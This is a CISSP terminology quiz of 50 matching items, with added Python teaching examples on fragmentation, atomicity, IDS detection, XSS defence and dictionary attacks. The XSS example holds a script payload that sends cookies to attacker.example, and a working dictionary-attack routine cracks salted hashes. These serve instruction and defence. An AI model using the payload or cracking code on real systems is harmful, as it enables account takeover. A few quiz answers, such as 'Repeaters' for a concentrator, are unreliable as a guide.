CISSP Certified Information Systems Security Professional
Subjects: certifications, it-skills, cissp
Instructions:
Answer 50 questions in 15 minutes.
If you are not ready to take this test, you can study first.
Match each statement with the correct term.
Don't refresh. All questions and answers are randomly picked and ordered every time you load a test.
This is a study tool. The 3 wrong answers for each question are randomly chosen from answers to other questions. So you might at times find the answers obvious, but repeating the test reinforces your understanding.
1. A BCP testing type - a test that answers the question: Can the organization operate at the alternate location only?
Full Test (Full Interruption)
Database Shadowing
War Dialing
UPS
2. A data storage device found inside a desktop or laptop as its permanent storage, or in a transportable (external) form attached to a desktop or laptop.
Hard Disk
Administrative
Threat Agent
Hub
3. Substitution at the word or phrase level
Infrastructure
Monitor
Code
Access Control Attacks
4. A Denial of Service attack that exploits packet-filter firewalls that inspect only the initial fragment of a fragmented packet.
Mixed Law System
Overlapping Fragment Attack
Consistency
Recovery
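The mechanism behind the overlapping-fragment item above, as an added illustration (this is not code from the quiz page): a filter that examines only the fragment at offset 0 passes the datagram, while the host's reassembly result depends on how it resolves the overlap. The fragment contents, offsets and the two policy names are constructed for the demo; real IP stacks differ in which policy (or mixture) they apply, which is the ambiguity the attack relies on.

```python
from dataclasses import dataclass


@dataclass
class Fragment:
    offset: int   # byte offset of this fragment's data in the reassembled payload
    data: bytes


def attack_fragments():
    """Constructed fragments: the first carries an innocent-looking prefix,
    a second fragment sent at the same offset overlaps and replaces it."""
    return [
        Fragment(0, b"GOOD:index.html"),   # what a first-fragment-only filter sees
        Fragment(0, b"EVIL"),              # overlaps bytes 0-3 of the first fragment
        Fragment(15, b"\n"),               # tail of the datagram
    ]


def first_fragment_filter(frags, blocked_prefix=b"EVIL"):
    """Packet filter that inspects only the fragment at offset 0.
    Returns True when the datagram is allowed through."""
    first = next(f for f in frags if f.offset == 0)
    return not first.data.startswith(blocked_prefix)


def reassemble(frags, policy="last"):
    """Reassemble fragments under one of two (hypothetical) overlap policies.
    'last'  : a later fragment overwrites bytes already received
    'first' : bytes already received are kept"""
    total = max(f.offset + len(f.data) for f in frags)
    buf = bytearray(total)
    written = [False] * total
    for f in frags:
        for i, byte in enumerate(f.data):
            pos = f.offset + i
            if policy == "last" or not written[pos]:
                buf[pos] = byte
                written[pos] = True
    return bytes(buf)


if __name__ == "__main__":
    frags = attack_fragments()
    print("filter allows:", first_fragment_filter(frags))
    print("host (last wins): ", reassemble(frags, "last"))
    print("host (first wins):", reassemble(frags, "first"))
```

The defence is to reassemble (or at least track fragment offsets) before making a filtering decision, or to drop datagrams whose fragments overlap at all.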
5. The former U.S. military-accepted set of standards and processes for network evaluation and assurance, combining functional and assurance requirements
TNI (Red Book)
Emergency Procedures
Algorithm
Salami
6. Processes data at different classifications (security levels) and users with different clearances (security levels) can use the system.
Operational
Site Policy Awareness
Information Risk Management (IRM)
Multilevel Security System
7. Momentary loss of power
Basics Of Secure Design
Business Continuity Planning (BCP)
Fault
Exercise
8. Uses a role-based method to determine access rights and permissions. Role-based access control is based on the user's role and responsibilities within the company.
Non-Discretionary Access Control
Risk
Surge Suppressor
Computer Forensics
9. Power surge
Inheritance
MOM
Electrostatic Discharge
Birthday Attack
10. Written norms, whether internally developed or adopted from national ones, that apply within an organization
Object
Injection
Standard
Common Criteria
11. The restoration of computer files from backup media, returning programs and production data to the state that existed at the time of the last safe backup.
Evidence
Site Policy
Data Recovery
Inheritance
12. Malware that subverts the detective controls of an operating system
Multi-Core
Aggregation
Storage Area Network (SAN)
Rootkit
13. The assignment of a level of sensitivity to data (or information) that results in the specification of controls for each level of classification.
Classification
Business Continuity Steering Committee
Mantrap (Double Door System)
Fault Tolerance
14. Weak evidence
Open Mail Relay Servers
Hearsay
Domain
Business Unit Recovery
15. An adversary intercepts encrypted communications, decrypts and views them, re-encrypts them and sends them along to the true destination
Hash Function
Slack Space
Man-In-The-Middle Attack
System Downtime
16. An approach by an organization that ensures its recovery and continuity in the face of a disaster or other major outage. Plans and methodologies are determined by the organization's strategy.
Contact List
Recovery Strategy
Incident Manager
Logic Bomb
17. Process of planning for and/or implementing procedures for the repair or relocation of the primary site and its contents - and for the restoration of normal operations at the primary site.
Entrapment
Identification
Alert
Restoration
18. Alerts personnel to the presence of a fire
Fire Detection
Data Marts
Trojan Horse
Hacker
19. Layer 1 network device used to connect network segments together but providing no traffic control (a concentrator).
Domain
Repeaters
Orange Book C2 Classification
Application Programming Interface
20. Granular decision by a system of permitting or denying access to a particular resource on the system
Security Blueprint
Authorization
Quantitative Risk Analysis
Electromagnetic Interference (EMI)
21. Agreement between two organizations (or two internal business groups) with basically the same equipment and environment that allows each to recover at the other's site.
Life Cycle of Evidence
Reciprocal Agreement
Message Digest
Running Key
22. Demonstrates the actual ability to recover and can verify the compatibility of backup facilities
Labeling
BCP Testing Drills and Exercises
Data Diddler
Activation
23. Indivisible: either all operations of a transaction take place or none do (in database design, also the rule that a data field holds only one value)
Atomicity
Quantitative Risk Analysis
Orange Book A Classification
Bit
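The all-or-nothing property in the atomicity item above, as an added worked example (not from the quiz page), using Python's built-in sqlite3 module. The ledger table, account names and amounts are constructed for the demo: a second transfer that would overdraw the source account raises after the debit has already been applied, and the transaction is rolled back rather than leaving half of the update in place.

```python
import sqlite3


def open_ledger():
    """Constructed in-memory ledger with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (name TEXT PRIMARY KEY, balance INTEGER NOT NULL)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", [("alice", 100), ("bob", 0)])
    conn.commit()
    return conn


def transfer(conn, src, dst, amount):
    """Move `amount` from src to dst as one atomic unit of work.
    `with conn:` commits if every statement succeeds and rolls the whole
    transaction back if an exception escapes, so a failed check after the
    first UPDATE cannot leave the debit applied without the credit."""
    try:
        with conn:
            conn.execute("UPDATE accounts SET balance = balance - ? WHERE name = ?", (amount, src))
            (remaining,) = conn.execute("SELECT balance FROM accounts WHERE name = ?", (src,)).fetchone()
            if remaining < 0:
                raise ValueError(f"insufficient funds in {src}")
            conn.execute("UPDATE accounts SET balance = balance + ? WHERE name = ?", (amount, dst))
        return True
    except ValueError:
        return False


def balances(conn):
    return dict(conn.execute("SELECT name, balance FROM accounts ORDER BY name"))


def demo():
    conn = open_ledger()
    first = transfer(conn, "alice", "bob", 60)    # alice 100 -> 40, bob 0 -> 60
    second = transfer(conn, "alice", "bob", 60)   # would take alice to -20: rolled back
    return first, second, balances(conn)


if __name__ == "__main__":
    print(demo())
```

Without the transaction boundary (for example, committing after each statement) the second call would leave alice at -20 with bob unchanged, which is exactly the partial-update state atomicity rules out.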
24. Key
Cryptovariable
Crisis
Highly Confidential
Tort
25. To segregate for the purposes of labeling
Compartmentalize
UPS
Restoration
Assembler
26. An organization's way of classifying data by factors such as criticality, sensitivity and ownership.
Classification Scheme
Incident Manager
Content Dependent Access Control
Structured Walkthrough
27. Induces a crime - tricks a person - and is illegal
Isolation
Kernel
Initialization Vector
Entrapment
28. An asymmetric cryptography mechanism that provides authentication (and, with it, integrity and non-repudiation).
Digital Signature
Wait
Substitution
Double Blind Testing
29. OOP concept of a distinct copy of the class
Patent
Reciprocal Agreement
Object
BCP Testing Drills and Exercises
30. The response of an organization to a disaster or other significant event that may significantly impact the organization - its people - or its ability to function productively.
Compression
Key Clustering
Incident Response
Critical Functions
31. Joining two pieces of text
Business Impact Assessment (BIA)
Top Secret
Information Flow Model
Concatenation
32. Server optimized for providing file-based data storage to the network. Unlike a file server, a NAS unit has no local input or output devices (keyboard or display), and its OS is dedicated to providing storage services.
Network Attached Storage (NAS)
Incident
Radio Frequency Interference (RFI)
Electrostatic Discharge
33. Can be statistical (monitor behavior) or signature based (watch for known attacks)
Plaintext
IDS Intrusion Detection System
Virtual Memory
Spam
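Both detection modes named in the IDS item above, run over a constructed web-server log as an added example (not code from the quiz page). The signature rules, the baseline request counts and every log line are made up for the demo. The point it shows: the signature detector catches the traversal and SQL-injection probes but is blind to the login brute force, while the statistical detector flags the brute-forcing source by volume alone without knowing anything about attack content.

```python
import re
from collections import Counter
from statistics import mean, pstdev

# Hypothetical signature rules: name plus a pattern for a known attack.
SIGNATURES = [
    ("path-traversal", re.compile(r"\.\./")),
    ("sqli-tautology", re.compile(r"'\s*or\s*'?1'?\s*=\s*'?1", re.I)),
]

# Constructed baseline: requests per source IP observed during a clean period.
BASELINE_REQUESTS_PER_SOURCE = [3, 2, 4, 3, 2, 4]

# Constructed live window, one request per line: "<src> <method> <path> <status>"
LIVE_LOG = [
    "10.0.0.5 GET /index.html 200",
    "10.0.0.5 GET /about.html 200",
    "10.0.0.5 GET /contact.html 200",
    "10.0.0.6 GET /index.html 200",
    "10.0.0.6 POST /login 302",
    "10.0.0.7 GET /login 200",
    "10.0.0.9 GET /static/../../etc/passwd 404",
    "10.0.0.9 GET /search?q=' OR '1'='1 200",
] + ["203.0.113.4 POST /login 401"] * 12


def signature_alerts(lines):
    """Signature mode: flag any line matching a known-attack pattern."""
    return [(name, line) for line in lines for name, rx in SIGNATURES if rx.search(line)]


def statistical_alerts(lines, baseline=BASELINE_REQUESTS_PER_SOURCE, k=3.0):
    """Statistical mode: flag sources whose request count in the window exceeds
    the baseline mean plus k standard deviations."""
    threshold = mean(baseline) + k * pstdev(baseline)
    counts = Counter(line.split()[0] for line in lines)
    return {src: n for src, n in counts.items() if n > threshold}


if __name__ == "__main__":
    for name, line in signature_alerts(LIVE_LOG):
        print(f"SIGNATURE {name}: {line}")
    for src, n in statistical_alerts(LIVE_LOG).items():
        print(f"ANOMALY {src}: {n} requests in window")
```

The threshold (mean plus 3 standard deviations of the baseline) is a deliberately simple model; a production anomaly detector would at least learn per-hour baselines and decay old data, but the trade-off is the same: signatures give precise, explainable alerts only for attacks already described, statistics catch new behaviour at the cost of tuning and false positives.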
34. An attack (not itself malware) that exploits users' trust in a website by injecting script into its pages, which can redirect users to untrusted websites that capture data or install malware
Cross-Site Scripting
Standard
Data Warehouse
Simulation Test
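The injection described in the cross-site scripting item above, shown as a vulnerable page beside its hardened form. This is an added example, not code from the quiz page; the greeting page, the link helper and the attacker payload are constructed for the demo. It also shows the caveat a practitioner needs: HTML-escaping fixes text context, but a `javascript:` URL inside an `href` contains no HTML metacharacters, so attribute context additionally needs a scheme check.

```python
import html
from urllib.parse import urlparse

# Constructed attacker input: script that sends the victim's cookie to a third-party host.
PAYLOAD = '<script>location="https://attacker.example/?c="+document.cookie</script>'


def greeting_vulnerable(name):
    """Untrusted input concatenated straight into HTML: the browser runs
    whatever markup the attacker supplied."""
    return f"<p>Hello, {name}!</p>"


def greeting_safe(name):
    """Same page with the input escaped for HTML text context."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def safe_href(url):
    """Escaping alone does not help inside an href: restrict the scheme first,
    then escape for the attribute. Anything not http(s) is replaced by '#'."""
    if urlparse(url).scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def link_safe(text, url):
    return f'<a href="{safe_href(url)}">{html.escape(text, quote=True)}</a>'


if __name__ == "__main__":
    print(greeting_vulnerable(PAYLOAD))
    print(greeting_safe(PAYLOAD))
    print(link_safe("home", "javascript:alert(document.cookie)"))
```

In a real application the escaping is done by the template engine's auto-escaping rather than by hand, but the context rule is the same: text, attribute, URL and script contexts each need their own encoding.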
35. Business and technical process of applying security software updates in a regulated periodic way
Patch Management
Detective
Concatenation
Full Test (Full Interruption)
36. Control category: to record an adversary's actions
Data Dictionary
Incident Response Team
Event
Detective
37. To move from location to location - keeping the same function
Job Rotation
Strategic
Watermarking
Database Shadowing
38. Disruption of operation of an electronic device due to a competing electromagnetic field.
Architecture
Data Custodian
Custodian
EMI
39. Try a list of words in passwords or encryption keys
Dictionary Attack
Cache
Honeypot
Restoration
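The attack in the dictionary-attack item above, run against a salted PBKDF2 password hash as an added example (not code from the quiz page). The wordlist, the mangling rules, the salt and both target passwords are constructed for the demo, and the iteration count is lowered from a production setting so it finishes in seconds. It shows why a salt does not stop a dictionary attack (the salt is stored beside the hash) while a slow key-derivation function does: every guess has to pay the full derivation cost.

```python
import hashlib
import hmac

# Constructed wordlist; a real attack uses millions of leaked passwords.
WORDLIST = ["123456", "password", "letmein", "qwerty", "welcome", "dragon"]
SUFFIXES = ["", "1", "123", "!"]
ITERATIONS = 20_000   # demo value; production settings are much higher


def derive(password, salt, iterations=ITERATIONS):
    """Salted PBKDF2-HMAC-SHA256, as a server would store it."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def candidates(wordlist):
    """Mangling rules: each word as-is and capitalised, with common suffixes."""
    for word in wordlist:
        for base in (word, word.capitalize()):
            for suffix in SUFFIXES:
                yield base + suffix


def dictionary_attack(stored_hash, salt, wordlist=WORDLIST, iterations=ITERATIONS):
    """Return the password if some candidate derives to stored_hash, else None."""
    for guess in candidates(wordlist):
        if hmac.compare_digest(derive(guess, salt, iterations), stored_hash):
            return guess
    return None


def demo():
    salt = b"fixed-demo-salt"   # fixed for reproducibility; use os.urandom(16) per user in practice
    weak = derive("Letmein123", salt)          # dictionary word + capitalisation + suffix
    strong = derive("p7#Vq!9zL2wR-hill", salt)  # not derivable from the wordlist
    return dictionary_attack(weak, salt), dictionary_attack(strong, salt)


if __name__ == "__main__":
    print(demo())
```

Each failed attack here costs 48 derivations; at a production iteration count and a million-word list the same loop is what makes a slow KDF the defence, since the defender pays the cost once per login and the attacker once per guess.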
40. Requirement of access to data for a clearly defined purpose
Cryptanalysis
Journaling
Need-To-Know
Recovery
41. Real-time - automatic and transparent backup of data.
Database Replication
Supervisor Mode (monitor - system - privileged)
Kerckhoff's Principle
Remote Journaling
42. Vehicle or tool that exploits a weakness
User Mode (problem or program state)
Threats
Cross Certification
Brouter
43. Alternate facility - other than the primary production site - where duplicated vital records and documentation may be stored for use during disaster recovery.
Plaintext
Injection
Exercise
Off-Site Storage
44. A Denial of Service attack initiated by sending spoofed UDP echo requests to IP broadcast addresses (see Smurf, the ICMP echo equivalent).
Digital Signature
Framework
Fraggle
Off-Site Storage
45. European standard for IT security evaluation criteria. It was not universally adopted. Consists of four components: 1. Security Target; 2. Target of Evaluation (ToE); 3. Functional Levels; 4. Assurance Levels.
Ethics
ISO/IEC 27001
Information Technology Security Evaluation Criteria - ITSEC
Blind Testing
46. The process of identifying, assessing and reducing risk to an acceptable level, and implementing the right countermeasures to maintain that level of risk
Information Risk Management (IRM)
Trapdoors (Backdoors) (Maintenance Hooks)
Entrapment
Storage Area Network (SAN)
47. A formal announcement by pre-authorized personnel that a disaster or severe outage is predicted or has occurred and that triggers pre-arranged mitigating actions (e.g. a move to an alternate site).
Residual Risk
Record Level Deletion
Off-Site
Declaration
48. The one person responsible for data - its classification and control setting
Wireless Fidelity (Wi-Fi )
UPS
Class
Information Owner
49. Highly sensitive internal documents that could seriously damage the organization if such information were lost or made public.
Top Secret
One Time Pad
Business Interruption Insurance
Distributed Processing
50. Standard for the establishment - implementation - control - and improvement of the Information Security Management System
SYN Flooding
ISO/IEC 27001
User
Policy